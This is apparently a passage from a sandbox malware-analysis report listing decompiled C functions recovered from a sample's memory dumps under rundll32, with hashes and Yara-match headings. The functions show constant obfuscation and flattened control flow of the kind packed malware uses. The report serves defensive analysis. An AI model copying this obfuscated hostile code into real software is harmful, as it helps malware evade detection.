                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                            			E00374346(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                            				signed int _v4;
                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                            				char _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				void* _t146;
                                                                                                                                                            				void* _t165;
                                                                                                                                                            				signed int _t170;
                                                                                                                                                            				signed int _t171;
                                                                                                                                                            				signed int _t172;
                                                                                                                                                            				signed int _t173;
                                                                                                                                                            				signed int _t174;
                                                                                                                                                            				void* _t177;
                                                                                                                                                            				intOrPtr* _t196;
                                                                                                                                                            				void* _t197;
                                                                                                                                                            				signed int* _t200;
                                                                                                                                                            
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_t196 = __ecx;
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t146);
                                                                                                                                                            				_v8 = 0x1587dd;
                                                                                                                                                            				_t200 =  &(( &_v72)[4]);
                                                                                                                                                            				_t197 = 0;
                                                                                                                                                            				_v4 = _v4 & 0;
                                                                                                                                                            				_t177 = 0x762b00a;
                                                                                                                                                            				_v40 = 0x54d1b5;
                                                                                                                                                            				_t170 = 0x79;
                                                                                                                                                            				_v40 = _v40 / _t170;
                                                                                                                                                            				_v40 = _v40 ^ 0x0000b372;
                                                                                                                                                            				_v16 = 0xa1afdd;
                                                                                                                                                            				_v16 = _v16 >> 0xd;
                                                                                                                                                            				_v16 = _v16 ^ 0x0000050c;
                                                                                                                                                            				_v68 = 0x910a11;
                                                                                                                                                            				_t171 = 0x13;
                                                                                                                                                            				_v68 = _v68 / _t171;
                                                                                                                                                            				_v68 = _v68 << 2;
                                                                                                                                                            				_v68 = _v68 + 0x13e3;
                                                                                                                                                            				_v68 = _v68 ^ 0x00184f98;
                                                                                                                                                            				_v32 = 0xaf4665;
                                                                                                                                                            				_t172 = 0x26;
                                                                                                                                                            				_v32 = _v32 * 0x1c;
                                                                                                                                                            				_v32 = _v32 ^ 0x13220c8d;
                                                                                                                                                            				_v56 = 0xf39368;
                                                                                                                                                            				_v56 = _v56 + 0xf012;
                                                                                                                                                            				_v56 = _v56 / _t172;
                                                                                                                                                            				_v56 = _v56 ^ 0x000d8e66;
                                                                                                                                                            				_v36 = 0xa121b7;
                                                                                                                                                            				_v36 = _v36 + 0x3186;
                                                                                                                                                            				_v36 = _v36 ^ 0x00aec580;
                                                                                                                                                            				_v72 = 0x8bd634;
                                                                                                                                                            				_t173 = 0x16;
                                                                                                                                                            				_v72 = _v72 / _t173;
                                                                                                                                                            				_v72 = _v72 | 0xc3992ef3;
                                                                                                                                                            				_v72 = _v72 + 0xf49;
                                                                                                                                                            				_v72 = _v72 ^ 0xc3912c07;
                                                                                                                                                            				_v24 = 0xbc86c6;
                                                                                                                                                            				_v24 = _v24 | 0x4f3bdf6c;
                                                                                                                                                            				_v24 = _v24 ^ 0x4fbb36fd;
                                                                                                                                                            				_v64 = 0xf11315;
                                                                                                                                                            				_v64 = _v64 | 0x791eed70;
                                                                                                                                                            				_v64 = _v64 + 0xffff781b;
                                                                                                                                                            				_v64 = _v64 | 0xb4748ed7;
                                                                                                                                                            				_v64 = _v64 ^ 0xfdf43fb6;
                                                                                                                                                            				_v28 = 0xa9ea5e;
                                                                                                                                                            				_v28 = _v28 << 9;
                                                                                                                                                            				_v28 = _v28 ^ 0x53d38433;
                                                                                                                                                            				_v44 = 0xab8ea7;
                                                                                                                                                            				_t174 = 0x5e;
                                                                                                                                                            				_v44 = _v44 / _t174;
                                                                                                                                                            				_v44 = _v44 >> 5;
                                                                                                                                                            				_v44 = _v44 ^ 0x00061aeb;
                                                                                                                                                            				_v48 = 0xf3254f;
                                                                                                                                                            				_v48 = _v48 + 0xffff7d1c;
                                                                                                                                                            				_v48 = _v48 ^ 0x338af708;
                                                                                                                                                            				_v48 = _v48 ^ 0x337c7814;
                                                                                                                                                            				_v60 = 0xe02c97;
                                                                                                                                                            				_v60 = _v60 * 0x4f;
                                                                                                                                                            				_v60 = _v60 + 0xffffa06e;
                                                                                                                                                            				_v60 = _v60 + 0x8165;
                                                                                                                                                            				_v60 = _v60 ^ 0x4522059f;
                                                                                                                                                            				_v52 = 0x13fe8b;
                                                                                                                                                            				_v52 = _v52 >> 6;
                                                                                                                                                            				_v52 = _v52 + 0xffffbd6d;
                                                                                                                                                            				_v52 = _v52 ^ 0x000eeb0b;
                                                                                                                                                            				_v20 = 0x7ee5fd;
                                                                                                                                                            				_v20 = _v20 | 0xb1050693;
                                                                                                                                                            				_v20 = _v20 ^ 0xb17ba1e4;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t177 != 0x29b5a10) {
                                                                                                                                                            						if(_t177 == 0x761c4cc) {
                                                                                                                                                            							_push(_t177);
                                                                                                                                                            							_t165 = E0037AE64(_v68, _t177, _a4, 0, _v56, _t177, _v36,  &_v12, _v40, _v72);
                                                                                                                                                            							_t200 =  &(_t200[0xa]);
                                                                                                                                                            							if(_t165 != 0) {
                                                                                                                                                            								_t177 = 0x29b5a10;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t177 == 0x762b00a) {
                                                                                                                                                            								_t177 = 0x761c4cc;
                                                                                                                                                            								continue;
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t177 != 0x7f1be9f) {
                                                                                                                                                            									goto L13;
                                                                                                                                                            								} else {
                                                                                                                                                            									_push(_t177);
                                                                                                                                                            									E0037AE64(_v44, _t177, _a4, _t197, _v60, _t177, _v52,  &_v12, _v16, _v20);
                                                                                                                                                            									 *_t196 = _v12;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L6:
                                                                                                                                                            						return _t197;
                                                                                                                                                            					}
                                                                                                                                                            					_push(_t177);
                                                                                                                                                            					_push(_t177);
                                                                                                                                                            					_t197 = E00377FF2(_v12);
                                                                                                                                                            					if(_t197 == 0) {
                                                                                                                                                            						_t177 = 0xc410c1b;
                                                                                                                                                            						goto L13;
                                                                                                                                                            					} else {
                                                                                                                                                            						_t177 = 0x7f1be9f;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					goto L6;
                                                                                                                                                            					L13:
                                                                                                                                                            				} while (_t177 != 0xc410c1b);
                                                                                                                                                            				goto L6;
                                                                                                                                                            			}

































                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
                                                                                                                                                            • Instruction ID: f6baba33a109f4d5d9ec3bce5cf8d30ec935dcc6f11581216c2f3cc98186a3f3
                                                                                                                                                            • Opcode Fuzzy Hash: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
                                                                                                                                                            • Instruction Fuzzy Hash: D17133B2109341AFD369CF21C98982BBBF1EBD9718F10891DF29556260D3B6D949CF83
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                            			E0038894B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                            				char _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				void* _t97;
                                                                                                                                                            				void* _t111;
                                                                                                                                                            				void* _t115;
                                                                                                                                                            				void* _t117;
                                                                                                                                                            				void* _t135;
                                                                                                                                                            				void* _t136;
                                                                                                                                                            				signed int _t137;
                                                                                                                                                            				signed int _t138;
                                                                                                                                                            				signed int _t139;
                                                                                                                                                            				signed int _t140;
                                                                                                                                                            				void* _t142;
                                                                                                                                                            				void* _t143;
                                                                                                                                                            
                                                                                                                                                            				_push(_a16);
                                                                                                                                                            				_t115 = __edx;
                                                                                                                                                            				_t135 = __ecx;
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t97);
                                                                                                                                                            				_v64 = 0x51cd23;
                                                                                                                                                            				_t143 = _t142 + 0x18;
                                                                                                                                                            				_t136 = 0;
                                                                                                                                                            				_t117 = 0x1f0121b;
                                                                                                                                                            				_t137 = 0x4d;
                                                                                                                                                            				_v64 = _v64 / _t137;
                                                                                                                                                            				_v64 = _v64 >> 9;
                                                                                                                                                            				_v64 = _v64 ^ 0x00032222;
                                                                                                                                                            				_v68 = 0xd4b8b7;
                                                                                                                                                            				_v68 = _v68 + 0xffffd2af;
                                                                                                                                                            				_v68 = _v68 ^ 0xd36e67b3;
                                                                                                                                                            				_v68 = _v68 ^ 0xd3b4aa1e;
                                                                                                                                                            				_v76 = 0x6efd74;
                                                                                                                                                            				_v76 = _v76 << 5;
                                                                                                                                                            				_v76 = _v76 ^ 0x2f6bad1f;
                                                                                                                                                            				_t138 = 0x34;
                                                                                                                                                            				_v76 = _v76 / _t138;
                                                                                                                                                            				_v76 = _v76 ^ 0x00af6c6b;
                                                                                                                                                            				_v52 = 0x9958c4;
                                                                                                                                                            				_v52 = _v52 + 0xffff4241;
                                                                                                                                                            				_v52 = _v52 ^ 0x009a50fc;
                                                                                                                                                            				_v56 = 0x2e84bf;
                                                                                                                                                            				_t139 = 0x72;
                                                                                                                                                            				_v56 = _v56 * 0x77;
                                                                                                                                                            				_v56 = _v56 ^ 0x15969b56;
                                                                                                                                                            				_v80 = 0x2bfbd3;
                                                                                                                                                            				_v80 = _v80 | 0xbb654ab5;
                                                                                                                                                            				_v80 = _v80 * 0x48;
                                                                                                                                                            				_v80 = _v80 >> 8;
                                                                                                                                                            				_v80 = _v80 ^ 0x00b72d27;
                                                                                                                                                            				_v60 = 0xb8f349;
                                                                                                                                                            				_v60 = _v60 / _t139;
                                                                                                                                                            				_v60 = _v60 ^ 0xcb885b35;
                                                                                                                                                            				_v60 = _v60 ^ 0xcb801a24;
                                                                                                                                                            				_v72 = 0xbf562d;
                                                                                                                                                            				_t140 = 0x42;
                                                                                                                                                            				_v72 = _v72 / _t140;
                                                                                                                                                            				_v72 = _v72 ^ 0xd5944d41;
                                                                                                                                                            				_v72 = _v72 ^ 0x4a8545c0;
                                                                                                                                                            				_v72 = _v72 ^ 0x9f1c34cb;
                                                                                                                                                            				_v48 = 0xda7c79;
                                                                                                                                                            				_v48 = _v48 << 0xc;
                                                                                                                                                            				_v48 = _v48 ^ 0xa7c49699;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t117 != 0x1f0121b) {
                                                                                                                                                            						if(_t117 == 0x20f75ec) {
                                                                                                                                                            							E00373DBC( &_v44, _t115, _v64, _v68, _v76);
                                                                                                                                                            							_t143 = _t143 + 0xc;
                                                                                                                                                            							_t117 = 0x98c428b;
                                                                                                                                                            							continue;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t117 == 0x98c428b) {
                                                                                                                                                            								_t111 = E00372A21(_v52, _v56,  &_v44, _t135, _v80);
                                                                                                                                                            								_t143 = _t143 + 0xc;
                                                                                                                                                            								__eflags = _t111;
                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                            									_t117 = 0xea94eac;
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								_t149 = _t117 - 0xea94eac;
                                                                                                                                                            								if(_t117 != 0xea94eac) {
                                                                                                                                                            									goto L11;
                                                                                                                                                            								} else {
                                                                                                                                                            									E0038D97D( &_v44, _v60, _t149, _v72, _t135 + 4, _v48);
                                                                                                                                                            									_t136 =  !=  ? 1 : _t136;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L6:
                                                                                                                                                            						return _t136;
                                                                                                                                                            					}
                                                                                                                                                            					_t117 = 0x20f75ec;
                                                                                                                                                            					L11:
                                                                                                                                                            					__eflags = _t117 - 0x3544eb3;
                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                            				goto L6;
                                                                                                                                                            			}

























                                                                                                                                                            0x00388acc
                                                                                                                                                            0x00388ac4
                                                                                                                                                            0x00388af3
                                                                                                                                                            0x00388afb
                                                                                                                                                            0x00388afb
                                                                                                                                                            0x00388b45
                                                                                                                                                            0x00388b47
                                                                                                                                                            0x00388b47
                                                                                                                                                            0x00388b47
                                                                                                                                                            0x00000000

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
                                                                                                                                                            • Instruction ID: 4fafd6bb604d9f0b9365fe4058ce9cf6d64d7dc0438a0baa3c095e55bcab7958
                                                                                                                                                            • Opcode Fuzzy Hash: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
                                                                                                                                                            • Instruction Fuzzy Hash: D0518771108301AFC759DF22C98681BBBE5FBD8708F50892DF59596260D772CA19CF86
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                            			E0038AC3A(void* __ecx) {
                                                                                                                                                            				signed int _v4;
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				void* _t82;
                                                                                                                                                            				signed int _t85;
                                                                                                                                                            				signed int _t86;
                                                                                                                                                            				void* _t88;
                                                                                                                                                            				void* _t96;
                                                                                                                                                            				void* _t97;
                                                                                                                                                            				signed int* _t99;
                                                                                                                                                            
                                                                                                                                                            				_t88 = __ecx;
                                                                                                                                                            				_t99 =  &_v28;
                                                                                                                                                            				_v24 = 0x5aa995;
                                                                                                                                                            				_v24 = _v24 | 0x25663b9c;
                                                                                                                                                            				_v24 = _v24 << 6;
                                                                                                                                                            				_t85 = 0x11;
                                                                                                                                                            				_v24 = _v24 / _t85;
                                                                                                                                                            				_t96 = 0;
                                                                                                                                                            				_v24 = _v24 ^ 0x05a97123;
                                                                                                                                                            				_t97 = 0xfe6f9f;
                                                                                                                                                            				_v16 = 0x9f09af;
                                                                                                                                                            				_v16 = _v16 + 0xcb37;
                                                                                                                                                            				_v16 = _v16 ^ 0x3a843722;
                                                                                                                                                            				_v16 = _v16 ^ 0x3a14bc19;
                                                                                                                                                            				_v28 = 0x7e93e4;
                                                                                                                                                            				_v28 = _v28 << 0xa;
                                                                                                                                                            				_t86 = 0x1a;
                                                                                                                                                            				_v28 = _v28 / _t86;
                                                                                                                                                            				_v28 = _v28 ^ 0x4056cd73;
                                                                                                                                                            				_v28 = _v28 ^ 0x49f3cf3d;
                                                                                                                                                            				_v4 = 0x47c602;
                                                                                                                                                            				_v4 = _v4 ^ 0xe3aa640e;
                                                                                                                                                            				_v4 = _v4 | 0xd85731ad;
                                                                                                                                                            				_v4 = _v4 ^ 0xfbf46e2b;
                                                                                                                                                            				_v8 = 0x201e29;
                                                                                                                                                            				_v8 = _v8 << 0x10;
                                                                                                                                                            				_v8 = _v8 * 0x48;
                                                                                                                                                            				_v8 = _v8 ^ 0x7b8200e2;
                                                                                                                                                            				_v12 = 0x18f9c1;
                                                                                                                                                            				_v12 = _v12 * 0x54;
                                                                                                                                                            				_v12 = _v12 << 6;
                                                                                                                                                            				_v12 = _v12 ^ 0x0c72dcb8;
                                                                                                                                                            				_v20 = 0xd6b502;
                                                                                                                                                            				_v20 = _v20 * 0x55;
                                                                                                                                                            				_v20 = _v20 << 0xd;
                                                                                                                                                            				_v20 = _v20 >> 0xb;
                                                                                                                                                            				_v20 = _v20 ^ 0x00034ef9;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t97 != 0xfe6f9f) {
                                                                                                                                                            						if(_t97 == 0x2f82a60) {
                                                                                                                                                            							_push(_t88);
                                                                                                                                                            							_push(_t88);
                                                                                                                                                            							_t82 = E0037474B();
                                                                                                                                                            							_t99 =  &(_t99[2]);
                                                                                                                                                            							_t97 = 0x6e030e4;
                                                                                                                                                            							_t96 = _t96 + _t82;
                                                                                                                                                            							continue;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t97 != 0x6e030e4) {
                                                                                                                                                            								goto L8;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t96 = _t96 + E0038C2F8(_v4, _t88 + 4, _v8, _v12, _v20);
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L5:
                                                                                                                                                            						return _t96;
                                                                                                                                                            					}
                                                                                                                                                            					_t97 = 0x2f82a60;
                                                                                                                                                            					L8:
                                                                                                                                                            				} while (_t97 != 0xea6061f);
                                                                                                                                                            				goto L5;
                                                                                                                                                            			}


















                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 40cc6cecb1fba03418c52cfe3ac00d0d2a6f5e6b8535ed7c2259ea5577511e05
                                                                                                                                                            • Instruction ID: 6395fbf6c7418d733f3512297fcaff0a84e463a60f94ea32d18e723981c387ec
                                                                                                                                                            • Opcode Fuzzy Hash: 40cc6cecb1fba03418c52cfe3ac00d0d2a6f5e6b8535ed7c2259ea5577511e05
                                                                                                                                                            • Instruction Fuzzy Hash: CC3176724083018BC315DF25D48540BFBE0FBD8788F118A1DF599A7221D375DA49CB97
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                            			E00378969(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                            				void* _t84;
                                                                                                                                                            				signed int _t99;
                                                                                                                                                            				signed int _t103;
                                                                                                                                                            				void* _t109;
                                                                                                                                                            				signed int _t110;
                                                                                                                                                            
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_t109 = __edx;
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				E003820B9(_t84);
                                                                                                                                                            				_v40 = _v40 & 0x00000000;
                                                                                                                                                            				_v36 = _v36 & 0x00000000;
                                                                                                                                                            				_v44 = 0x779abe;
                                                                                                                                                            				_v20 = 0xb5573d;
                                                                                                                                                            				_v20 = _v20 ^ 0xbb0d078e;
                                                                                                                                                            				_t103 = 0x58;
                                                                                                                                                            				_v20 = _v20 * 0x30;
                                                                                                                                                            				_v20 = _v20 ^ 0x328c396d;
                                                                                                                                                            				_v16 = 0x362481;
                                                                                                                                                            				_v16 = _v16 + 0x16cb;
                                                                                                                                                            				_v16 = _v16 | 0xfe676eb4;
                                                                                                                                                            				_v16 = _v16 ^ 0xfe76a30b;
                                                                                                                                                            				_v32 = 0xc91798;
                                                                                                                                                            				_v32 = _v32 * 0x65;
                                                                                                                                                            				_v32 = _v32 ^ 0x4f59c84a;
                                                                                                                                                            				_v28 = 0xb97254;
                                                                                                                                                            				_v28 = _v28 / _t103;
                                                                                                                                                            				_v28 = _v28 ^ 0x000673a7;
                                                                                                                                                            				_v12 = 0xb6c56;
                                                                                                                                                            				_v12 = _v12 * 0x2a;
                                                                                                                                                            				_v12 = _v12 << 1;
                                                                                                                                                            				_v12 = _v12 * 0x5b;
                                                                                                                                                            				_v12 = _v12 ^ 0x5515a6e4;
                                                                                                                                                            				_v8 = 0x1f2e02;
                                                                                                                                                            				_v8 = _v8 * 0x66;
                                                                                                                                                            				_v8 = _v8 * 0x79;
                                                                                                                                                            				_v8 = _v8 + 0xffff535b;
                                                                                                                                                            				_v8 = _v8 ^ 0xdf3e36a5;
                                                                                                                                                            				_v24 = 0x692813;
                                                                                                                                                            				_v24 = _v24 >> 0xb;
                                                                                                                                                            				_v24 = _v24 + 0xffffcb9d;
                                                                                                                                                            				_v24 = _v24 ^ 0xfffb0f76;
                                                                                                                                                            				E0038D25E(_t103);
                                                                                                                                                            				_v16 = 0x87422f;
                                                                                                                                                            				_v16 = _v16 | 0xfc58150b;
                                                                                                                                                            				_v16 = _v16 ^ 0xfcdf572b;
                                                                                                                                                            				_v20 = 0xc6266d;
                                                                                                                                                            				_v20 = _v20 << 0xa;
                                                                                                                                                            				_v20 = _v20 + 0xffff7638;
                                                                                                                                                            				_v20 = _v20 ^ 0x18992a28;
                                                                                                                                                            				_t99 = E00380AE0(_v20, _v16);
                                                                                                                                                            				_push(_v24);
                                                                                                                                                            				_t110 = _t99;
                                                                                                                                                            				_push(_t109);
                                                                                                                                                            				_push(_t110);
                                                                                                                                                            				_push(1);
                                                                                                                                                            				E003780E3(_v12, _v8);
                                                                                                                                                            				 *((short*)(_t109 + _t110 * 2)) = 0;
                                                                                                                                                            				return 0;
                                                                                                                                                            			}



















                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
                                                                                                                                                            • Instruction ID: 3e5406abcb25b316d11540da5aa8c5d2a0722cc22880f34f2699853e9a0e3ef7
                                                                                                                                                            • Opcode Fuzzy Hash: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
                                                                                                                                                            • Instruction Fuzzy Hash: 9C41CF75C0121AEBCF18DFE5C98A9EEBFB0FB44314F108199D525AA260D3B95B45CF90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                            			E0038DBEA(char* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                            				void* _t74;
                                                                                                                                                            				char* _t82;
                                                                                                                                                            				signed int _t84;
                                                                                                                                                            
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_t82 = __edx;
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				E003820B9(_t74);
                                                                                                                                                            				_v20 = _v20 & 0x00000000;
                                                                                                                                                            				_v16 = _v16 & 0x00000000;
                                                                                                                                                            				_v28 = 0x71ca23;
                                                                                                                                                            				_v24 = 0x57f692;
                                                                                                                                                            				_v12 = 0xd3252c;
                                                                                                                                                            				_v12 = _v12 + 0x4351;
                                                                                                                                                            				_v12 = _v12 + 0xffff5b79;
                                                                                                                                                            				_v12 = _v12 ^ 0x00d2c3f6;
                                                                                                                                                            				_v8 = 0xbb067e;
                                                                                                                                                            				_t84 = 0x11;
                                                                                                                                                            				_v8 = _v8 / _t84;
                                                                                                                                                            				_v8 = _v8 >> 8;
                                                                                                                                                            				_v8 = _v8 ^ 0xac5d3832;
                                                                                                                                                            				_v8 = _v8 ^ 0xac5d3334;
                                                                                                                                                            				_v8 = 0xab60c2;
                                                                                                                                                            				_v8 = _v8 << 0x10;
                                                                                                                                                            				_v8 = _v8 ^ 0x910d5570;
                                                                                                                                                            				_v8 = _v8 >> 4;
                                                                                                                                                            				_v8 = _v8 ^ 0x0f1cf547;
                                                                                                                                                            				if( *__edx != 0) {
                                                                                                                                                            					do {
                                                                                                                                                            						_v8 = 0xbb067e;
                                                                                                                                                            						_v8 = _v8 / _t84;
                                                                                                                                                            						_v8 = _v8 >> 8;
                                                                                                                                                            						_v8 = _v8 ^ 0xac5d3832;
                                                                                                                                                            						_v8 = _v8 ^ 0xac5d3334;
                                                                                                                                                            						_v8 = 0xab60c2;
                                                                                                                                                            						_v8 = _v8 << 0x10;
                                                                                                                                                            						_v8 = _v8 ^ 0x910d5570;
                                                                                                                                                            						_v8 = _v8 >> 4;
                                                                                                                                                            						_v8 = _v8 ^ 0x0f1cf547;
                                                                                                                                                            						_v12 =  *_t82;
                                                                                                                                                            						_v12 = _v12 + (_v12 << _v8);
                                                                                                                                                            						_v12 = _v12 + (_v12 << _v8);
                                                                                                                                                            						_v12 = _v12 - _v12;
                                                                                                                                                            						_t82 = _t82 + 1;
                                                                                                                                                            						_t84 = 0x11;
                                                                                                                                                            					} while ( *_t82 != 0);
                                                                                                                                                            				}
                                                                                                                                                            				return _v12;
                                                                                                                                                            			}













                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
